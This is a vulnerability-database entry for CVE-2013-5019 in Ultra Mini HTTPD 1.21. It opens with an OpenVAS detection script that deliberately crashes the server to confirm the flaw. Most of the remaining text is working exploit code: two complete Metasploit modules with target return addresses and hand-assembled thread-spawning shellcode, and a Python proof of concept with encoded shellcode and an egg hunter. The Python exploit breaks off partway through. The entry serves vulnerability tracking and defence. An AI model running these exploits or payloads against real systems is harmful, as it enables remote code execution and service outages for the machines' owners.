Ultra Mini HTTPD Stack Buffer Overflow Vulnerability
2013-07-16T00:00:00
ID OPENVAS:1361412562310803721 Type openvas Reporter Copyright (C) 2013 Greenbone Networks GmbH Modified 2020-07-17T00:00:00
Description
The host is running the Ultra Mini HTTPD server, which is prone to a stack-based
buffer overflow vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# Ultra Mini HTTPD Stack Buffer Overflow Vulnerability
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
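# Registration phase: when `description` is set, only the metadata below is
# recorded and the script exits before any traffic is sent to a target.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.803721");
  script_version("2020-07-17T08:17:17+0000");

  # CVSS v2 vector: network reachable, low complexity, no authentication,
  # complete loss of confidentiality, integrity and availability.
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2013-5019");
  script_tag(name:"last_modification", value:"2020-07-17 08:17:17 +0000 (Fri, 17 Jul 2020)");
  script_tag(name:"creation_date", value:"2013-07-16 11:19:36 +0530 (Tue, 16 Jul 2013)");
  script_name("Ultra Mini HTTPD Stack Buffer Overflow Vulnerability");

  # The impact text names code execution as well as the crash, so that it
  # agrees with the C:C/I:C/A:C vector above; a denial-of-service-only wording
  # would lead triage to understate the finding.
  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute arbitrary code
or cause the application to crash, creating a denial-of-service condition.");
  script_tag(name:"vuldetect", value:"Send a large crafted data via HTTP GET request and check
the server is crashed or not.");
  script_tag(name:"affected", value:"Ultra Mini HTTPD server Version 1.21.");
  script_tag(name:"insight", value:"The flaw is due to an error when processing certain long requests and can be
exploited to cause a denial of service via a specially crafted packet.");

  # No vendor fix is expected (solution_type WillNotFix), so remediation means
  # removing or replacing the product rather than patching it.
  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
  script_tag(name:"summary", value:"The host is running Ultra Mini HTTPD server and is prone to stack based buffer
overflow vulnerability.");
  script_tag(name:"solution_type", value:"WillNotFix");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/26739/");
  script_xref(name:"URL", value:"http://exploitsdownload.com/exploit/windows/ultra-mini-httpd-121-stack-buffer-overflow");

  # ACT_DENIAL: the active part of this script tries to make the service stop
  # responding, so a vulnerable host is disrupted by the scan itself. Schedule
  # it only where an outage of the target is acceptable.
  # NOTE(review): scanners normally skip this category when safe checks are
  # enabled - confirm against the scan configuration in use.
  script_category(ACT_DENIAL);

  # remote_vul: the result comes from an active remote check, not a banner or
  # version comparison.
  script_tag(name:"qod_type", value:"remote_vul");
  script_copyright("Copyright (C) 2013 Greenbone Networks GmbH");
  script_family("Buffer overflow");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);

  # Not launched when the Settings/disable_cgi_scanning key is set.
  script_exclude_keys("Settings/disable_cgi_scanning");
  exit(0);
}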
include("http_func.inc");
include("http_keepalive.inc");
# Active check for CVE-2013-5019. It runs only against a port whose cached
# /index.html carries the Ultra Mini HTTPD marker and which still answers HTTP
# before the probe is sent.
port = http_get_port(default:80);
ultra_mini_marker = ">Ultra Mini Httpd";

# Fingerprint from the cached front page; any other product is out of scope.
res = http_get_cache(item:"/index.html", port:port);
if(!res || ultra_mini_marker >!< res)
  exit(0);

# A service that is already unresponsive must not be attributed to this check.
if(http_is_dead(port:port))
  exit(0);

# Probe: a GET request with an over-long resource name, sent three times.
# The responses are deliberately ignored; only the follow-up request matters.
probe_req = http_get(item:string("A", crap(10000)), port:port);
i = 0;
while(i < 3) {
  http_send_recv(port:port, data:probe_req);
  i++;
}

# Follow-up: request the same page that was used for fingerprinting.
verify_req = http_get(item:"/index.html", port:port);
res = http_send_recv(port:port, data:verify_req);

# Marker still served: the service survived the probe. Exit code 99 is the
# scanner's convention for "checked, not affected".
if(res && ultra_mini_marker >< res)
  exit(99);

# No response, or a response without the marker, is reported as vulnerable.
# NOTE(review): the verdict rests on this single request, so a timeout or a
# dropped connection looks the same as a crash. Confirming with a second
# http_is_dead(port:port) call before reporting would reduce false positives.
security_message(port:port);
exit(0);
{"id": "OPENVAS:1361412562310803721", "type": "openvas", "bulletinFamily": "scanner", "title": "Ultra Mini HTTPD Stack Buffer Overflow Vulnerability", "description": "The host is running Ultra Mini HTTPD server and is prone to stack based buffer\n overflow vulnerability.", "published": "2013-07-16T00:00:00", "modified": "2020-07-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803721", "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/26739/", "http://exploitsdownload.com/exploit/windows/ultra-mini-httpd-121-stack-buffer-overflow"], "cvelist": ["CVE-2013-5019"], "lastseen": "2020-07-21T22:00:08", "viewCount": 3, "enchantments": {"dependencies": {}, "score": {"value": 7.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-5019"]}, {"type": "exploitdb", "idList": ["EDB-ID:44472"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/ULTRAMINIHTTP_BOF"]}, {"type": "nessus", "idList": ["GLOBAL_SETTINGS.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122811"]}, {"type": "zdt", "idList": ["1337DAY-ID-21109"]}]}, "exploitation": null, "vulnersScore": 7.5}, "pluginID": "1361412562310803721", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ultra Mini HTTPD Stack Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY 
or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803721\");\n script_version(\"2020-07-17T08:17:17+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2013-5019\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 08:17:17 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-16 11:19:36 +0530 (Tue, 16 Jul 2013)\");\n script_name(\"Ultra Mini HTTPD Stack Buffer Overflow Vulnerability\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause\n the application to crash, creating a denial-of-service condition.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a large crafted data via HTTP GET request and check\n the server is crashed or not.\");\n\n script_tag(name:\"affected\", value:\"Ultra Mini HTTPD server Version 1.21.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error when processing certain long requests and can be\n exploited to cause a denial of service via a specially crafted packet.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running Ultra Mini HTTPD server and is prone to stack based buffer\n overflow vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/26739/\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/windows/ultra-mini-httpd-121-stack-buffer-overflow\");\n\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nres = http_get_cache(item:\"/index.html\", port:port);\nif(!res || \">Ultra Mini Httpd\" >!< res)\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nreq = http_get(item:string(\"A\", crap(10000)), port:port);\n\nfor(i = 0; i < 3; i++)\n http_send_recv(port:port, data:req);\n\nreq = http_get(item:\"/index.html\", port:port);\nres = http_send_recv(port:port, data:req);\n\nif(!res || \">Ultra Mini Httpd\" >!< res) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Buffer overflow", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645298940}}
{"zdt": [{"lastseen": "2018-01-05T17:07:32", "description": "This Metasploit module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21 allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request.", "cvss3": {}, "published": "2013-08-15T00:00:00", "type": "zdt", "title": "Ultra Mini HTTPD Stack Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5019"], "modified": "2013-08-15T00:00:00", "id": "1337DAY-ID-21109", "href": "https://0day.today/exploit/description/21109", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ultra Mini HTTPD Stack Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21\r\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\r\n request.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'superkojiman', #Discovery, PoC\r\n 'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '95164'],\r\n ['EDB','26739'],\r\n ['CVE','2013-5019'],\r\n ['BID','61130']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1623,\r\n 'StackAdjustment' => -3500,\r\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f\"\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"thread\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'v1.21 - Windows XP SP3',\r\n {\r\n 'Offset' => 5412,\r\n 'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll\r\n 
}\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 10 2013',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def exploit\r\n buf = rand_text(target['Offset'])\r\n buf << [target.ret].pack(\"V*\")\r\n buf << payload.encoded\r\n\r\n print_status(\"Sending buffer...\")\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"/#{buf}\"\r\n })\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/21109", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:32", "description": "", "cvss3": {}, "published": "2013-08-14T00:00:00", "type": "packetstorm", "title": "Ultra Mini HTTPD Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5019"], "modified": "2013-08-14T00:00:00", "id": "PACKETSTORM:122811", "href": "https://packetstormsecurity.com/files/122811/Ultra-Mini-HTTPD-Stack-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Ultra Mini HTTPD Stack Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21 \nallowing remote attackers to execute arbitrary code via a long resource name in an HTTP \nrequest. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'superkojiman', #Discovery, PoC \n'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit \n], \n'References' => \n[ \n['OSVDB', '95164'], \n['EDB','26739'], \n['CVE','2013-5019'], \n['BID','61130'] \n], \n'Payload' => \n{ \n'Space' => 1623, \n'StackAdjustment' => -3500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"thread\" \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ \n'v1.21 - Windows XP SP3', \n{ \n'Offset' => 5412, \n'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jul 10 2013', \n'DefaultTarget' => 0 \n)) \nend \n \ndef exploit \nbuf = rand_text(target['Offset']) \nbuf << [target.ret].pack(\"V*\") \nbuf << payload.encoded \n \nprint_status(\"Sending buffer...\") \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => \"/#{buf}\" \n}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122811/ultraminihttp_bof.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-12T22:39:26", "description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21, allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request. This exploit has to deal with the fact that the application's request handler thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates some RWX memory, copies the payload to it and creates another thread. 
When done, it terminates the current thread so that it doesn't crash and hence doesn't bring down the process with it.\n", "edition": 2, "cvss3": {}, "published": "2013-08-11T20:33:40", "type": "metasploit", "title": "Ultra Mini HTTPD Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5019"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ULTRAMINIHTTP_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n ADDR_VIRTUALALLOC = 0x0041A140\n ADDR_CREATETHREAD = 0x0041A240\n ADDR_TERMINATETHREAD = 0x0041A23C\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Ultra Mini HTTPD Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. 
When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'superkojiman', # Discovery, PoC\n 'PsychoSpy <neinwechter[at]gmail.com>', # Metasploit\n 'OJ Reeves <oj[at]buffered.io>' # Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '95164'],\n ['EDB','26739'],\n ['CVE','2013-5019'],\n ['BID','61130']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"thread\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'v1.21 - Windows Server 2000',\n {\n 'Offset' => 5412,\n 'Ret' => 0x78010324 # push esp / ret - msvcrt.dll\n }\n ],\n [\n 'v1.21 - Windows XP SP0',\n {\n 'Offset' => 5412,\n 'Ret' => 0x77C4C685 # push esp / ret - msvcrt.dll\n }\n ],\n [\n 'v1.21 - Windows XP SP2/SP3',\n {\n 'Offset' => 5412,\n 'Ret' => 0x77c354b4 # push esp / ret - msvcrt.dll\n }\n ],\n [\n 'v1.21 - Windows Server 2003 (Enterprise)',\n {\n 'Offset' => 5412,\n 'Ret' => 0x77BDD7F5 # push esp / ret - msvcrt.dll\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-07-10',\n 'DefaultTarget' => 0\n ))\n end\n\n def mov_eax(addr)\n \"\\xB8\" + [addr].pack(\"V*\")\n end\n\n def call_addr_eax(addr)\n mov_eax(addr) + \"\\xff\\x10\"\n end\n\n def exploit\n new_thread = \"\"\n\n # we use 0 a lot, so set EBX to zero so we always have it handy\n new_thread << \"\\x31\\xdb\" # xor ebx,ebx\n\n # store esp in esi, and offset it to point at the rest of the payload\n # as this will be used as the source for copying to the area of memory\n # which will be executed in a separate thread. 
We fill in the offset\n # at the end as we can calculate it instead of hard-code it\n new_thread << \"\\x89\\xe6\" # mov esi,esp\n new_thread << \"\\x83\\xc6\\x00\" # add esp,<TODO>\n esi_count_offset = new_thread.length - 1\n\n # Create a new area of memory with RWX permissions that we can copy\n # the payload to and execute in another thread. This is required\n # because the current thread is killed off after 60 seconds and it\n # takes our payload's execution with it.\n new_thread << \"\\x6a\\x40\" # push 0x40\n new_thread << \"\\x68\\x00\\x30\\x00\\x00\" # push 0x3000\n new_thread << \"\\x68\\x00\\x10\\x00\\x00\" # push 0x1000\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << call_addr_eax(ADDR_VIRTUALALLOC) # call VirtualAlloc\n\n # copy the rest of the payload over to the newly allocated area of\n # memory which is executable.\n payload_size = [payload.encoded.length].pack(\"V*\")\n new_thread << \"\\xb9\" + payload_size # mov ecx,payload_size\n new_thread << \"\\x89\\xc7\" # mov edi,eax\n new_thread << \"\\xf2\\xa4\" # rep movsb\n\n # kick of the payload in a new thread\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x50\" # push eax (payload dress)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << \"\\x53\" # push ebx (0)\n new_thread << call_addr_eax(ADDR_CREATETHREAD) # call CreateThread\n\n # Terminate the current thread so that we don't crash and hence bring\n # the entire application down with us.\n new_thread << \"\\x53\" # push ebx (0)\n # set ebx to 0xFFFFFFFE as this is the psuedohandle for the current thread\n new_thread << \"\\x4b\" # dec ebx\n new_thread << \"\\x4b\" # dec ebx\n new_thread << \"\\x53\" # push ebx (0xFFFFFFFE)\n new_thread << call_addr_eax(ADDR_TERMINATETHREAD) # call CreateThread\n\n # patch the offset of esi back into the payload\n nops = 32\n decode_stub_size = 23\n calculated_offset = new_thread.length + nops + 
decode_stub_size\n new_thread[esi_count_offset, 1] = [calculated_offset].pack(\"c*\")\n\n # start constructing our final payload\n buf = rand_text_alpha_upper(target['Offset'])\n buf << [target.ret].pack(\"V*\")\n\n # ESP points right to the top of our shellcode so we just add a few nops\n # to the start to avoid having the first few bytes nailed by the decoder.\n buf << make_nops(nops)\n\n # we re-encode, including the thread creation stuff and the chosen payload\n # as we don't currently have the ability to \"prepend raw\" stuff to the front\n # of the buffer prior to encoding.\n buf << encode_shellcode_stub(new_thread)\n buf << payload.encoded\n\n print_status(\"Sending buffer...\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"/#{buf}\"\n })\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/ultraminihttp_bof.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:59:56", "description": "Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.", "cvss3": {}, "published": "2013-07-31T13:20:00", "type": "cve", "title": "CVE-2013-5019", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5019"], "modified": "2018-04-27T01:29:00", "cpe": ["cpe:/a:vector:ultra_mini_httpd:1.21"], "id": "CVE-2013-5019", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vector:ultra_mini_httpd:1.21:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:51:47", "description": "A buffer overflow vulnerability has been reported in Vector Ultra Mini HTTPD. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "checkpoint_advisories", "title": "Ultra Mini HTTPD Resource Name Request Handling Stack Buffer Overflow - Ver2 (CVE-2013-5019)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5019"], "modified": "2015-03-26T00:00:00", "id": "CPAI-2015-0386", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:04", "description": "", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "exploitdb", "title": "Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2013-5019", "CVE-2013-5019"], "modified": "2018-04-17T00:00:00", "id": "EDB-ID:44472", "href": "https://www.exploit-db.com/exploits/44472", "sourceData": "# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow\r\n# Date: 2018-04-14\r\n# Exploit Author: jollymongrel\r\n# Vendor Homepage: http://www.vector.co.jp\r\n# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html\r\n# Version: 1.2\r\n# Tested on: Windows 7 32-bit\r\n# CVE : CVE-2013-5019\r\n\r\nimport sys\r\nimport socket\r\nimport struct\r\n\r\neip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]\r\n\r\n#windows/exec - 274 bytes\r\n#http://www.metasploit.com\r\n#Encoder: x86/shikata_ga_nai\r\n#EXITFUNC=thread\r\n#CMD=calc.exe\r\n#badchars='\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x2f\\x3f'\r\nshellcode = (\"no0bno0b\"+\"\\xb8\\x21\\xa0\\xa2\\xbd\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\"\r\n\"\\x3e\\x31\\x43\\x15\\x83\\xc3\\x04\\x03\\x43\\x11\\xe2\\xd4\\x1a\\x51\\xd8\"\r\n\"\\x25\\xbd\\x4c\\xf4\\x90\\x35\\x55\\x0f\\x79\\x9f\\x5c\\x5e\\x45\\x5c\\xb5\"\r\n\"\\x5d\\x84\\x31\\x44\\x9d\\x46\\xde\\x89\\xb2\\x1a\\x92\\xe6\\x1d\\x26\\x1d\"\r\n\"\\xa1\\xb0\\xfa\\x6c\\x5a\\x1e\\xf7\\xb7\\xb6\\xfb\\x71\\xbf\\x2a\\x51\\xb6\"\r\n\"\\x2a\\x53\\x27\\x2a\\x43\\x49\\x67\\xe7\\x66\\x6a\\x6e\\xe3\\x10\\x46\\x27\"\r\n\"\\xe5\\x1f\\xc5\\xb5\\xad\\x32\\x57\\x38\\xd3\\x66\\xa8\\xa7\\xf8\\xe0\\xfc\"\r\n\"\\x1a\\x33\\xce\\x22\\xf0\\xad\\x34\\xff\\x3a\\x42\\x91\\x07\\x6d\\xe5\\xf1\"\r\n\"\\x79\\x73\\xa3\\xe9\\xbf\\xd7\\xbf\\xa7\\x10\\x06\\xf2\\x2c\\x81\\x6a\\xa0\"\r\n\"\\x97\\x46\\xae\\xe7\\x33\\x1c\\x87\\x02\\x5d\\x8d\\xd7\\x5a\\xbe\\x7c\\xa9\"\r\n\"\\x96\\x7f\\x04\\xbd\\xe4\\xb5\\xbc\\xa0\\xf5\\xf3\\x12\\x66\\x6c\\xbc\\xb7\"\r\n\"\\xb2\\x49\\x01\\x66\\xd3\\x8f\\x40\\x5b\\x33\\x07\\x22\\x30\\x0e\\x11\\xc6\"\r\n\"\\x89\\xfa\\xbc\\x18\\x0f\\x33\\x18\\xb1\\x01\\xe0\\x53\\x4a\\x2
3\\xab\\x77\"\r\n\"\\x17\\x7f\\xf8\\x4f\\xdd\\x01\\x79\\x04\\xa6\\x82\\xe0\\xc4\\x33\\x06\\x12\"\r\n\"\\x36\\x43\\x2d\\xc6\\x8a\\xfb\\x24\\x67\\x4a\\xc6\\x5a\\x4a\\x4c\\x97\\x4c\"\r\n\"\\x1b\\x68\\x98\\xf8\\x45\\x2d\\x86\\x43\\xbe\\x0e\\x96\\x8f\\xca\\x89\\x7e\"\r\n\"\\x5b\\xe1\\x8b\\xb2\\x5f\\xd0\\x94\\xdf\\x5e\\x7c\\x0e\\x25\\xa5\\xf7\\xea\"\r\n\"\\x9d\\x1b\\xa9\\x58\\x50\\x3a\\xb8\\x77\\x16\\xb1\\x87\\x48\\x94\\x37\\x87\"\r\n\"\\x9a\\x9d\\xe2\\xd0\")\r\n\r\n#egg hunter to search for no0bno0b\r\negghunter = (\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\"\\xef\\xb8\\x6e\\x6f\\x30\\x62\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\")\r\n\r\npayload = \"A\" * 537\r\npayload += shellcode\r\npayload += \"A\" * (967 - len(payload))\r\npayload += eip\r\npayload += egghunter\r\npayload += \"\\xff\\xe7\" #jmp edi\r\npayload += \"C\" * (1007 - len(payload))\r\n\r\nprint \"[+] sending payload, length\", len(payload)\r\n\r\nbuf = \"GET /\"+payload+\"HTTP/1.1\\r\\n\\r\\n\"\r\ns = socket.socket(socket.AF_INET, 